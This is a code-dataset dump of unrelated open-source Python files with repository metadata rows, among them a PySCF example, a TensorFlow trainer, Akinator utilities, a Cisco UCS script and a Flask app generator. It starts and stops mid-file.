"refractive_caustics": False,
},
"performance": {
"render_tile": [512, 512],
"threads": {"mode": "FIXED", "num_threads": 8},
},
"layers": {"use_hair": False},
}
scene = {"units": {"length_units": "METRIC", "rotation_units": "DEGREES"}}
layers = {"denoising": {"use_denoising": False}}
field = {
"material": {
"mapping": {
"translation": (0.0, 0.05, 0.0),
"rotation": (0.0, -pi / 2.0, 0.0),
"scale": (1.0, 0.6, 1.0),
},
"mix_lower_grass": {
"inp1": (0.000, 0.012, 0.00076, 1.0),
"inp2": (0.020, 0.011, 0.0, 1.0),
},
"mix_upper_grass": {
"inp1": (0.247, 0.549, 0.0, 1),
"inp2": (0.257, 0.272, 0.0, 1),
},
"noise": {"inp": [5.0, 2.0, 0.0]},
"hsv": {"inp": [0.0, 0.0, 1.9, 1.0]},
"mix_up_grass_hsv": {"inp0": 0.455},
"mix_low_grass_field_lines": {"inp0": 0.4},
"mix_grass": {"inp0": 0.391},
"principled": {"specular": 0.225, "roughness": 0.625},
},
"lower_plane": {
"colour": (0.003, 0.04, 0.0, 1.0),
"principled": {"specular": 0.225, "roughness": 1.0},
"mapping": {"scale": (0.1, 0.1, 1.0)},
},
}
ball = {
"initial_cond": {"segments": 16, "ring_count": 10, "calc_uvs": True},
"material": {"metallic": 0.0, "roughness": 0.35},
"subsurf_mod": {"levels": 1, "rend_levels": 4},
}
goal = {
"initial_cond": {"vertices": 32, "calc_uvs": True},
"corner_curve": {"fill": "FULL"},
"material": {"metallic": 0.0, "roughness": 0.35, "colour": (0.8, 0.8, 0.8, 1.0)},
"subsurf_mod": {"levels": 1, "rend_levels": 4},
}
robot = {"material": {"specular": 0.742, "metallic": 0.0, "roughness": 0.9}}
| 31.432432 | 85 | 0.503439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,097 | 0.471625 |
913206ffbcd62d973e6003afaac405c6a7ea1d3b | 524 | py | Python | portfolio_optimization/constants.py | AI-Traiding-Team/paired_trading | 72d4dd0071314e2f0efaa26931ca7339199fc998 | [
"MIT"
] | 1 | 2022-03-26T23:21:51.000Z | 2022-03-26T23:21:51.000Z | portfolio_optimization/constants.py | AI-Traiding-Team/paired_trading | 72d4dd0071314e2f0efaa26931ca7339199fc998 | [
"MIT"
] | null | null | null | portfolio_optimization/constants.py | AI-Traiding-Team/paired_trading | 72d4dd0071314e2f0efaa26931ca7339199fc998 | [
"MIT"
] | 3 | 2021-12-07T07:39:43.000Z | 2022-01-24T05:05:55.000Z | import os
path1 = "outputs"
path2 = "outputs/_imgs"
path3 = "outputs/max_sharpe_weights"
path4 = "outputs/opt_portfolio_trades"
try:
os.mkdir(path1)
except OSError:
print ("Директория %s уже создана" % path1)
else:
print ("Успешно создана директория %s " % path1)
try:
os.makedirs(path2)
os.makedirs(path3)
os.makedirs(path4)
except OSError:
print ("Директории уже созданы")
else:
print ("Успешно созданы нужные директории")
source_path = '../source_root/1m'
destination_path = 'outputs' | 20.153846 | 52 | 0.704198 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 322 | 0.521036 |
913439b2a09a820bfc3faefc3e105469f128a1a8 | 1,352 | py | Python | examples/qmmm/02-mcscf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 501 | 2018-12-06T23:48:17.000Z | 2022-03-31T11:53:18.000Z | examples/qmmm/02-mcscf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 710 | 2018-11-26T22:04:52.000Z | 2022-03-30T03:53:12.000Z | examples/qmmm/02-mcscf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 273 | 2018-11-26T10:10:24.000Z | 2022-03-30T12:25:28.000Z | #!/usr/bin/env python
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
A simple example to run MCSCF with background charges.
'''
import numpy
from pyscf import gto, scf, mcscf, qmmm
mol = gto.M(atom='''
C 1.1879 -0.3829 0.0000
C 0.0000 0.5526 0.0000
O -1.1867 -0.2472 0.0000
H -1.9237 0.3850 0.0000
H 2.0985 0.2306 0.0000
H 1.1184 -1.0093 0.8869
H 1.1184 -1.0093 -0.8869
H -0.0227 1.1812 0.8852
H -0.0227 1.1812 -0.8852
''',
basis='3-21g',
verbose=4)
numpy.random.seed(1)
coords = numpy.random.random((5,3)) * 10
charges = (numpy.arange(5) + 1.) * -.1
#
# There are two ways to add background charges to MCSCF method.
# The recommended one is to initialize it in SCF calculation. The MCSCF
# calculation takes the information from SCF objects.
#
mf = qmmm.mm_charge(scf.RHF(mol), coords, charges).run()
mc = mcscf.CASSCF(mf, 6, 6)
mc.run()
mc = mcscf.CASCI(mf, 6, 6)
mc.run()
#
# The other method is to patch the MCSCF object with the background charges.
# Note: it updates the underlying SCF object inplace.
#
mo_init = mf.mo_coeff
mf = scf.RHF(mol)
mc = mcscf.CASSCF(mf, 6, 6)
mc = qmmm.mm_charge(mc, coords, charges)
mc.run(mo_init)
mf = scf.RHF(mol)
mc = mcscf.CASCI(mf, 6, 6)
mc = qmmm.mm_charge(mc, coords, charges)
mc.run(mo_init)
| 22.915254 | 76 | 0.637574 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 755 | 0.558432 |
9136160d5624a0c97151f5a92ef4449fe0be2b28 | 1,951 | py | Python | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | import array as arr
a = arr.array('i', [ 1,2,3,4,5,6])
print(a)
# Accessing elements
print(a[2])
print(a[-2])
# BASIC ARRAY OPERATIONS
# Find length of array
print()
print('Length of array')
print(len(a))
# Adding elements to an array
# append() to add a single element at the end of an array
# extend() to add more than one element at the end of an array
# insert() to add an element at a specific position in an array
print()
# append
print('Append')
a.append(8)
print(a)
# extend
print()
print('Extend')
a.extend([9,8,6,5,4])
print(a)
# insert
print()
print('Insert')
a.insert(2,6) # first param is the index, second param is the value
print(a)
# Removing elements from an array
# pop() Remove an element and return it
# remove() Remove element with a specific value without returning it
print()
print(a)
# pop
print('pop')
print(a.pop()) # removes last element
print(a)
print(a.pop(2))
print(a)
print(a.pop(-1))
print(a)
# remove
print()
print('remove')
print(a.remove(8)) # remove() doesn't return the removed value; it removes the first occurrence of '8'
print(a)
# Array Concatenation
print()
print('Array Concatenation')
b = arr.array('i', [1,2,3,4,5,6,7])
c = arr.array('i', [3,4,2,1,3,5,6,7,8])
d = arr.array('i')
d = b + c
print(d)
# Slicing an Array
print()
print('Slicing an Array') # This means fetching some particular values from an array
print(d)
print(d[0:5]) # Doesn't include the value on the right index
print(d[0:-2])
print(d[::-1]) # Reverses the array; note this builds a reversed copy, so it uses extra memory
# Looping through an Array
print()
print('Looping through an Array')
print('Using for')
for x in d:
print(x, end=' ')
print()
for x in d[0:-3]:
print(x, end=' ')
print()
print('Using while')
temp = 0
while temp < d[2]:
print(d[temp], end = ' ')
temp = temp + 1 # Can use temp+=1, it's the same thing
print()
print(a)
tem = 0
while tem < len(a):
print(a[tem], end=' ')
tem += 1
print()
| 18.759615 | 95 | 0.664787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,054 | 0.540236 |
91374929866f2c29362313f46503faaf0a90ed51 | 1,506 | py | Python | setup.py | yitzikc/athena2pd | d2d6b886a70e958f51d90103600572152eaa7bb9 | [
"MIT"
] | 1 | 2020-04-05T18:41:17.000Z | 2020-04-05T18:41:17.000Z | setup.py | yitzikc/athena2pd | d2d6b886a70e958f51d90103600572152eaa7bb9 | [
"MIT"
] | null | null | null | setup.py | yitzikc/athena2pd | d2d6b886a70e958f51d90103600572152eaa7bb9 | [
"MIT"
] | 1 | 2021-04-22T09:22:31.000Z | 2021-04-22T09:22:31.000Z | from setuptools import setup, find_packages
def find_version(path):
import re
    # path shall be a plain ascii text file
s = open(path, 'rt').read()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", s, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError('Version not found')
def get_requirements(filename):
with open(filename, 'r') as fh:
return [l.strip() for l in fh]
def get_long_desc(filename):
with open(filename, 'r') as fh:
return fh.read()
setup(
name='athena2pd',
packages=['athena2pd'],
version=find_version('athena2pd/__init__.py'),
description='Help\'s simplify the access of databases stored in Amazon Athena by using SQL and pandas DataFrames.',
long_description=get_long_desc('README.md'),
long_description_content_type='text/markdown',
author='Joe Dementri',
maintainer='Joe Dementri',
maintainer_email='joedementri42012@gmail.com',
license='MIT',
install_requires=get_requirements('requirements.txt'),
zip_safe=False,
url='https://github.com/joedementri/athena2pd',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent'
],
python_requires='>=2.7,>=3.6'
) | 33.466667 | 119 | 0.653386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 660 | 0.438247 |
913effe79b3a41e71c6774354a20673cc5bf2cf7 | 672 | py | Python | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | import sigplot as sp
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
matplotlib.rcParams['toolbar'] = 'None'
plt.style.use('dark_background')
fig = plt.figure()
# seed = np.linspace(3, 7, 1000)
# a = (np.sin(2 * np.pi * seed))
# b = (np.cos(2 * np.pi * seed))
# sp.correlate(fig, b, a, 300)
t = np.linspace(0, 1, 500)
b = (np.cos(2 * np.pi * t))
# x = np.concatenate([np.zeros(500), signal.sawtooth(2 * np.pi * 5 * t), np.zeros(500), np.ones(120), np.zeros(500)])
x = np.concatenate([np.zeros(500), np.ones(500), np.zeros(500)])
sp.fourier_series(fig, x, 100, 200, 200)
plt.show()
# WriteToVideo("twoPulse.mp4", anim);
| 25.846154 | 118 | 0.623512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 318 | 0.473214 |
914dad243b4f6fd43e52b214d9db3b5771ad2444 | 623 | py | Python | Perforce/AppUtils.py | TomMinor/MayaPerforce | 52182c7e5c3e91e41973d0c2abbda8880e809e49 | [
"MIT"
] | 13 | 2017-03-31T21:52:19.000Z | 2021-09-06T23:15:30.000Z | Perforce/AppUtils.py | TomMinor/MayaPerforce | 52182c7e5c3e91e41973d0c2abbda8880e809e49 | [
"MIT"
] | 3 | 2017-05-08T02:27:43.000Z | 2017-05-10T03:20:11.000Z | Perforce/AppUtils.py | TomMinor/MayaPerforce | 52182c7e5c3e91e41973d0c2abbda8880e809e49 | [
"MIT"
] | 3 | 2017-05-05T14:03:03.000Z | 2020-05-25T10:25:04.000Z | import os
import sys
import re
import logging
p4_logger = logging.getLogger("Perforce")
# Import app-specific utilities; Maya opens scenes differently than Nuke, etc.
# Are we in maya or nuke?
if re.match( "maya", os.path.basename( sys.executable ), re.I ):
p4_logger.info("Configuring for Maya")
from MayaUtils import *
elif re.match( "nuke", os.path.basename( sys.executable ), re.I ):
p4_logger.info("Configuring for Nuke")
from NukeUtils import *
else:
p4_logger.warning("Couldn't find app configuration")
raise ImportError("No supported applications found that this plugin can interface with")
| 32.789474 | 90 | 0.738363 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 271 | 0.434992 |
914ea6fbc1fedc5c88691906b2f1c1f56a6d040c | 5,907 | py | Python | fhir/immunizations_demo/models/trainer/model.py | kourtneyshort/healthcare | 1d1e2375304ac99f43a8b6aee7374fcdf641eb6f | [
"Apache-2.0"
] | null | null | null | fhir/immunizations_demo/models/trainer/model.py | kourtneyshort/healthcare | 1d1e2375304ac99f43a8b6aee7374fcdf641eb6f | [
"Apache-2.0"
] | 22 | 2019-12-16T22:18:37.000Z | 2022-03-12T00:04:43.000Z | fhir/immunizations_demo/models/trainer/model.py | kourtneyshort/healthcare | 1d1e2375304ac99f43a8b6aee7374fcdf641eb6f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""A simple logistics regression model for immunization prediction.
The following features are used in this model:
1. age of the patient
2. gender of the patient
3. country the patient is visiting
4. expected duration of stay
5. disease
We are predicting the possibility of the patient getting a disease.
Note that this model is part of an end-to-end demo which shows how
to leverage the Google Cloud Healthcare APIs (FHIR APIs specifically)
to finish data analysis and machine learning tasks. This problem
itself is not a natural machine learning task.
"""
import tensorflow as tf
from functools import reduce
# Input data specific flags.
tf.flags.DEFINE_string("training_data", default=None,
help="Path to training data. This should be a GCS path.")
tf.flags.DEFINE_string("eval_data", default=None,
help="Path to evaluation data. This should be a GCS path.")
# Model specific flags. See more details here:
# https://www.tensorflow.org/api_docs/python/tf/estimator/LinearClassifier
tf.flags.DEFINE_string("model_dir", default=None,
help="Estimator model_dir.")
tf.flags.DEFINE_string("export_model_dir", default=None,
help="Folder to export trained model.")
tf.flags.DEFINE_integer("batch_size", default=96,
help="Mini-batch size for the training.")
tf.flags.DEFINE_integer("training_steps", default=1000,
help="Total number of training steps.")
tf.flags.DEFINE_integer("eval_steps", default=100,
help="Total number of evaluation steps.")
tf.flags.DEFINE_integer("n_classes", default=2,
help="Number of categories to classify to.")
# More advanced flags that controls the behavior of FTRL optimizer.
# See more details here:
# https://www.tensorflow.org/api_docs/python/tf/train/FtrlOptimizer
tf.flags.DEFINE_float("learning_rate", default=0.01,
help="Learning rate")
tf.flags.DEFINE_float("l1_regularization_strength", default=0.005,
help="L1 regularization strength for FTRL optimizer.")
tf.flags.DEFINE_float("l2_regularization_strength", default=0.001,
help="L2 regularization strength for FTRL optimizer.")
FLAGS = tf.flags.FLAGS
# Feature and label keys.
FEATURE_KEYS = ['age', 'gender', 'country', 'duration', 'disease']
LABEL_KEYS = ['risk']
DS_BUFFER_SIZE = 50000
def build_input_fn(filename):
"""Builds the input funciton for training/evaluation.
Args:
filename (string): The path of the file that contains features and
labels. This can be a Google Cloud Storage path (e.g. gs://...).
"""
def input_fn():
"""Input function to be used by the classifier."""
def parse(serialized_example):
"""Parses a single tensorflow example."""
def parse_feature(features, key):
features[key] = tf.FixedLenFeature([], tf.int64)
return features
data = tf.parse_single_example(serialized_example,
features=reduce(parse_feature, FEATURE_KEYS + LABEL_KEYS, {}))
features = [tf.convert_to_tensor(tf.cast(data[key], tf.int32))
for key in FEATURE_KEYS]
labels = [tf.convert_to_tensor(tf.cast(data[key], tf.int32))
for key in LABEL_KEYS]
return features, labels
dataset = tf.data.TFRecordDataset(filename, buffer_size=DS_BUFFER_SIZE)
dataset = dataset.map(parse).cache().repeat()
dataset = dataset.batch(FLAGS.batch_size)
features, labels = dataset.make_one_shot_iterator().get_next()
# Slice features into a dictionary which is expected by the classifier.
features = tf.transpose(features)
    def map_feature(features_dict, idx):
      """Maps an individual feature into the features dictionary."""
      features_dict[FEATURE_KEYS[idx]] = tf.transpose(
          tf.nn.embedding_lookup(features, [idx]))
      return features_dict
    return reduce(map_feature, list(range(len(FEATURE_KEYS))), {}), labels
return input_fn
def build_serving_input_receiver_fn():
"""Builds a serving_input_receiver_fn which takes JSON as input."""
def serving_input_receiver_fn():
def add_input(inputs, feature):
inputs[feature] = tf.placeholder(shape=[None], dtype=tf.int32)
return inputs
inputs = reduce(add_input, FEATURE_KEYS, {})
return tf.estimator.export.ServingInputReceiver(inputs, inputs)
return serving_input_receiver_fn
def main(_):
# All features have been converted to integer representation beforehand.
feature_columns = [tf.feature_column.numeric_column(key=key, dtype=tf.int32)
for key in FEATURE_KEYS]
classifier = tf.estimator.LinearClassifier(
feature_columns=feature_columns,
model_dir=FLAGS.model_dir,
n_classes=FLAGS.n_classes,
optimizer=tf.train.FtrlOptimizer(
learning_rate=FLAGS.learning_rate,
l1_regularization_strength=FLAGS.l1_regularization_strength,
l2_regularization_strength=FLAGS.l2_regularization_strength),
config=tf.estimator.RunConfig(keep_checkpoint_max=1))
# Training.
classifier.train(
input_fn=build_input_fn(FLAGS.training_data),
steps=FLAGS.training_steps)
# Evaluation.
classifier.evaluate(
input_fn=build_input_fn(FLAGS.eval_data),
steps=FLAGS.eval_steps)
# Export SavedModel.
if FLAGS.export_model_dir is not None:
classifier.export_saved_model(
FLAGS.export_model_dir,
build_serving_input_receiver_fn())
if __name__ == '__main__':
# Set logging level to INFO.
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
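# Example invocation (a sketch; the bucket and local paths are illustrative):
#   python model.py \
#     --training_data=gs://my-bucket/immunization/train.tfrecord \
#     --eval_data=gs://my-bucket/immunization/eval.tfrecord \
#     --model_dir=/tmp/immunization_model \
#     --export_model_dir=/tmp/immunization_export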
| 34.54386 | 78 | 0.744033 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,749 | 0.46538 |
e66fe14aa361b0d83b0ed955a7d77eeda49c3b80 | 571 | py | Python | face2anime/nb_utils.py | davidleonfdez/face2anime | 896bf85a7aa28322cc9e9e586685db8cbbf39d89 | [
"MIT"
] | null | null | null | face2anime/nb_utils.py | davidleonfdez/face2anime | 896bf85a7aa28322cc9e9e586685db8cbbf39d89 | [
"MIT"
] | 1 | 2022-01-15T23:57:33.000Z | 2022-01-15T23:57:33.000Z | face2anime/nb_utils.py | davidleonfdez/face2anime | 896bf85a7aa28322cc9e9e586685db8cbbf39d89 | [
"MIT"
] | null | null | null | import importlib
__all__ = ['mount_gdrive']
def mount_gdrive() -> str:
"""Mount Google Drive storage of the current Google account and return the root path.
    Functionality is only available in the Google Colab environment; otherwise, it raises a RuntimeError.
"""
if (importlib.util.find_spec("google.colab") is None):
raise RuntimeError("Cannot mount Google Drive outside of Google Colab.")
from google.colab import drive
drive.mount('/content/gdrive', force_remount=True)
root_dir = "/content/gdrive/My Drive/"
return root_dir
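# Example usage (inside a Colab notebook; the subfolder is illustrative):
#   root = mount_gdrive()            # -> "/content/gdrive/My Drive/"
#   data_dir = root + "datasets/"    # then read/write under Drive as usual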
| 28.55 | 97 | 0.712785 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 316 | 0.553415 |
e67c30a42d5e25d4e6e974aeebd81a4f702b3cd2 | 5,417 | py | Python | akinator/utils.py | GitHubEmploy/akinator.py | 67c688b0332f4caa72bacc8fbc8f95abfe2290c9 | [
"MIT"
] | null | null | null | akinator/utils.py | GitHubEmploy/akinator.py | 67c688b0332f4caa72bacc8fbc8f95abfe2290c9 | [
"MIT"
] | null | null | null | akinator/utils.py | GitHubEmploy/akinator.py | 67c688b0332f4caa72bacc8fbc8f95abfe2290c9 | [
"MIT"
] | null | null | null | """
MIT License
Copyright (c) 2019 NinjaSnail1080
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from .exceptions import InvalidAnswerError, InvalidLanguageError, AkiConnectionFailure, AkiTimedOut, AkiNoQuestions, AkiServerDown, AkiTechnicalError
import re
import json
def ans_to_id(ans):
"""Convert an input answer string into an Answer ID for Akinator"""
ans = str(ans).lower()
if ans == "yes" or ans == "y" or ans == "0":
return "0"
elif ans == "no" or ans == "n" or ans == "1":
return "1"
elif ans == "i" or ans == "idk" or ans == "i dont know" or ans == "i don't know" or ans == "2":
return "2"
elif ans == "probably" or ans == "p" or ans == "3":
return "3"
elif ans == "probably not" or ans == "pn" or ans == "4":
return "4"
else:
raise InvalidAnswerError("""
You put "{}", which is an invalid answer.
The answer must be one of these:
- "yes" OR "y" OR "0" for YES
- "no" OR "n" OR "1" for NO
- "i" OR "idk" OR "i dont know" OR "i don't know" OR "2" for I DON'T KNOW
- "probably" OR "p" OR "3" for PROBABLY
- "probably not" OR "pn" OR "4" for PROBABLY NOT
""".format(ans))
def get_lang_and_theme(lang=None):
"""Returns the language code and theme based on what is input"""
if lang is None or lang == "en" or lang == "english":
return {"lang": "en", "theme": "c"}
elif lang == "en_animals" or lang == "english_animals":
return {"lang": "en", "theme": "a"}
elif lang == "en_objects" or lang == "english_objects":
return {"lang": "en", "theme": "o"}
elif lang == "ar" or lang == "arabic":
return {"lang": "ar", "theme": "c"}
elif lang == "cn" or lang == "chinese":
return {"lang": "cn", "theme": "c"}
elif lang == "de" or lang == "german":
return {"lang": "de", "theme": "c"}
elif lang == "de_animals" or lang == "german_animals":
return {"lang": "de", "theme": "a"}
elif lang == "es" or lang == "spanish":
return {"lang": "es", "theme": "c"}
elif lang == "es_animals" or lang == "spanish_animals":
return {"lang": "es", "theme": "a"}
elif lang == "fr" or lang == "french":
return {"lang": "fr", "theme": "c"}
elif lang == "fr_animals" or lang == "french_animals":
return {"lang": "fr", "theme": "a"}
elif lang == "fr_objects" or lang == "french_objects":
return {"lang": "fr", "theme": "o"}
elif lang == "il" or lang == "hebrew":
return {"lang": "il", "theme": "c"}
elif lang == "it" or lang == "italian":
return {"lang": "it", "theme": "c"}
elif lang == "it_animals" or lang == "italian_animals":
return {"lang": "it", "theme": "a"}
elif lang == "jp" or lang == "japanese":
return {"lang": "jp", "theme": "c"}
elif lang == "jp_animals" or lang == "japanese_animals":
return {"lang": "jp", "theme": "a"}
elif lang == "kr" or lang == "korean":
return {"lang": "kr", "theme": "c"}
elif lang == "nl" or lang == "dutch":
return {"lang": "nl", "theme": "c"}
elif lang == "pl" or lang == "polish":
return {"lang": "pl", "theme": "c"}
elif lang == "pt" or lang == "portuguese":
return {"lang": "pt", "theme": "c"}
elif lang == "ru" or lang == "russian":
return {"lang": "ru", "theme": "c"}
elif lang == "tr" or lang == "turkish":
return {"lang": "tr", "theme": "c"}
else:
raise InvalidLanguageError("You put \"{}\", which is an invalid language.".format(lang))
def raise_connection_error(response):
"""Raise the proper error if the API failed to connect"""
if response == "KO - SERVER DOWN":
raise AkiServerDown("Akinator's servers are down in this region. Try again later or use a different language")
elif response == "KO - TECHNICAL ERROR":
raise AkiTechnicalError("Akinator's servers have had a technical error. Try again later or use a different language")
elif response == "KO - TIMEOUT":
raise AkiTimedOut("Your Akinator session has timed out")
elif response == "KO - ELEM LIST IS EMPTY" or response == "WARN - NO QUESTION":
raise AkiNoQuestions("\"Akinator.step\" reached 80. No more questions")
else:
        raise AkiConnectionFailure("An unknown error has occurred. Server response: {}".format(response))
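# Example usage (return values follow the mappings above):
#   ans_to_id("probably not")         # -> "4"
#   get_lang_and_theme("de_animals")  # -> {"lang": "de", "theme": "a"}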
| 44.04065 | 149 | 0.606055 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,109 | 0.573934 |
e67e2b8d5cc36e4de07019122375c2f2fc7e621b | 765 | py | Python | ucs-python/create_ucs_sp_template.py | movinalot/ucs | dc0d37784592d6d78f46efee40c86b6f7ac928b4 | [
"MIT"
] | null | null | null | ucs-python/create_ucs_sp_template.py | movinalot/ucs | dc0d37784592d6d78f46efee40c86b6f7ac928b4 | [
"MIT"
] | null | null | null | ucs-python/create_ucs_sp_template.py | movinalot/ucs | dc0d37784592d6d78f46efee40c86b6f7ac928b4 | [
"MIT"
] | 2 | 2020-06-17T15:49:37.000Z | 2021-01-28T07:21:21.000Z | """
create_ucs_sp_template.py
Purpose:
    Create a UCS Service Profile Template in UCS Manager
Author:
John McDonough (jomcdono@cisco.com) github: (@movinalot)
Cisco Systems, Inc.
"""
from ucsmsdk.ucshandle import UcsHandle
from ucsmsdk.mometa.ls.LsServer import LsServer
from ucsmsdk.mometa.org.OrgOrg import OrgOrg
HANDLE = UcsHandle(
"sandbox-ucsm1.cisco.com",
"admin",
"password"
)
HANDLE.login()
ORG_ORG = OrgOrg(
parent_mo_or_dn='org-root',
name="devnet",
)
HANDLE.add_mo(ORG_ORG, modify_present=True)
HANDLE.commit()
SP_TEMPLATE = LsServer(
parent_mo_or_dn='org-root/org-devnet',
name="devcore_template",
type="updating-template"
)
HANDLE.add_mo(SP_TEMPLATE, modify_present=True)
HANDLE.commit()
HANDLE.logout()
| 19.125 | 60 | 0.732026 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 308 | 0.402614 |
e67fead92c8110015c821a38623a6b98e6c63185 | 5,793 | py | Python | create_flask_app.py | Creativity-Hub/create_flask_app | 4c4e2c7360c7773f6f5e3d2fd30e310777650f57 | [
"MIT"
] | 2 | 2020-08-05T04:33:20.000Z | 2020-08-06T23:03:40.000Z | create_flask_app.py | Creativity-Hub/create_flask_app | 4c4e2c7360c7773f6f5e3d2fd30e310777650f57 | [
"MIT"
] | null | null | null | create_flask_app.py | Creativity-Hub/create_flask_app | 4c4e2c7360c7773f6f5e3d2fd30e310777650f57 | [
"MIT"
] | null | null | null | import os
import argparse
def check_for_pkg(pkg):
try:
exec("import " + pkg)
	except ImportError:
os.system("pip3 install --user " + pkg)
def create_flask_app(app='flask_app', threading=False, wsgiserver=False, unwanted_warnings=False, logging=False, further_logging=False, site_endpoints=None, endpoints=None, request_endpoints=None):
check_for_pkg('flask')
lines = ["from flask import Flask, send_from_directory","import codecs", "import os"]
params = {
'app': app,
'threading': threading,
'wsgiserver': wsgiserver,
'unwanted_warnings': unwanted_warnings,
'logging': logging,
'further_logging': further_logging,
'site_endpoints': site_endpoints,
'endpoints': endpoints,
'request_endpoints': request_endpoints
}
if __name__ == '__main__':
parser = argparse.ArgumentParser()
for param in params.keys():
if 'endpoints' in param:
parser.add_argument('-'+param[0].lower(), '--'+param.lower(), nargs='+', help='', required=False)
else:
parser.add_argument('-'+param[0].lower(), '--'+param.lower(), help='', required=False)
args = vars(parser.parse_args())
for param in args.keys():
		if 'request' in param and args[param] is not None and len(args[param]) % 3 != 0:
print('Request method endpoint format invalid, enter "Method" "Endpoint" "Parameter"')
if param == 'app':
if args[param] != None:
params[param] = args[param]
else:
params[param] = args[param]
index = "<!DOCTYPE html>\n<html>\n<head>\n\t<title>endpoint</title>\n\t<link href='static/style.css' rel='stylesheet'>\n</head>\n<body>\n\n<script src='static/script.js'></script>\n</body>\n</html>"
project = params['app']
if not os.path.exists(project):
os.mkdir(project)
if not os.path.exists(project+'/web'):
os.mkdir(project+'/web')
if not os.path.exists(project+'/static'):
os.mkdir(project+'/static')
os.system('touch '+project+'/static/style.css')
os.system('touch '+project+'/static/script.js')
indexFile = open(project+"/web/index.html","w+")
indexFile.write(index.replace('endpoint', project))
indexFile.close()
f = open(project+'/'+project+".py","w+")
headers = {
'threading': ["", "#Threading", "from threading import Thread"],
'wsgiserver': ["", "#WSGIServer", "from gevent.pywsgi import WSGIServer"],
'unwanted_warnings': ["", "#Disable Warnings", "import warnings", "warnings.filterwarnings('ignore')"],
'logging': ["", "#Logging", "import logging", "", "#Logging configuration set to debug on debug.log file", "logging.basicConfig(filename='debug.log',level=logging.DEBUG)", "logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')"],
'further_logging': ["", "#Disable unneeded dependencies logging", "werkzeugLog = logging.getLogger('werkzeug')", "werkzeugLog.disabled = True", "requestsLog = logging.getLogger('urllib3.connectionpool')", "requestsLog.disabled = True"],
}
for param in headers.keys():
if params[param]:
for line in headers[param]:
lines.append(line)
lines.append("\ndef run():")
if params['wsgiserver']:
check_for_pkg('gevent')
lines.append("\t#WSGIServer")
lines.append("\tWSGIServer(('', 8081), app).serve_forever()")
else:
lines.append("\tapp.run(host='0.0.0.0',port=8081)")
if params['threading']:
for line in ["", "#Thread", "def keep_alive():", "\tt = Thread(target=run)", "\tt.start()"]:
lines.append(line)
for line in ["", "app = Flask(__name__)", "", "@app.route('/')", "def main():", "\t#index.html", "\treturn codecs.open('web/index.html', 'r', 'utf-8').read()", "", "@app.route('/favicon.ico')", "def favicon():", "\treturn send_from_directory(os.path.join(app.root_path, 'static'),'favicon.ico', mimetype='image/vnd.microsoft.icon')"]:
lines.append(line)
site_endpoints = params['site_endpoints']
if site_endpoints is not None:
for ep in site_endpoints:
print('Endpoint: ' + ep)
